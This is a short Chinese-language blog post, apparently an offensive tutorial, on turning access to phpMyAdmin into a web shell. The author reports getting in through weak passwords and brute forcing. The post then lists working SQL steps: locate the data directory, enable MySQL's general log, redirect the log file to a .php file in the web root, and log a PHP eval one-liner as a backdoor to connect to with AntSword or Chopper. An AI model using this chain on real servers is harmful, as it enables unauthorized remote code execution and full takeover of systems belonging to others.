phpmyadmin getshell之利用日志文件

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。

我这边经过弱口令，爆破，目录泄露等途径已进入PhpMyadmin

收集有用信息

查看数据库路存放径

Select @@datadir;

成功获取数据库地址，这里呢凭自己经验来猜测根目录吧。

在这里我就不详写了，我在这里也只是写个思路！！！

那么问题来了！既然我们有了根目录，我们可以怎么写shell呢？

利用日志文件

mysql 5.0版本以上会创建日志文件，修改日志的全局变量，也可以getshell。但是也要对生成的日志有可读可写的权限。

(可以从信息收集得到，我们的Mysql版本是>5.0的)

查看日志状态

show variables like '%general%';

开启general时，所执行的sql语句都会出现在*******.log文件。那么，如果修改general_log_file的值，所执行的sql语句会生成shell

开启日志读写

SET GLOBAL general_log='on'

既然开启了，那我们就来简单的Getshell

创建文件

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

对应就会生成123.php文件

那我们开始写一句话

SELECT '<?php eval($_POST["cmd"]);?>'

一句话木马生成在根目录，直接用蚁剑或者菜刀链接即可

这里我就不把shell截图出来了！

总结:这篇文章我也只是简单的提及一下思路，我之前也是因为没有根目录就算有了对方的phpmyadmin我依旧没法子getshell，所以我就写了这一篇文章，给各位在phpmyadmin getshell之路的大佬们。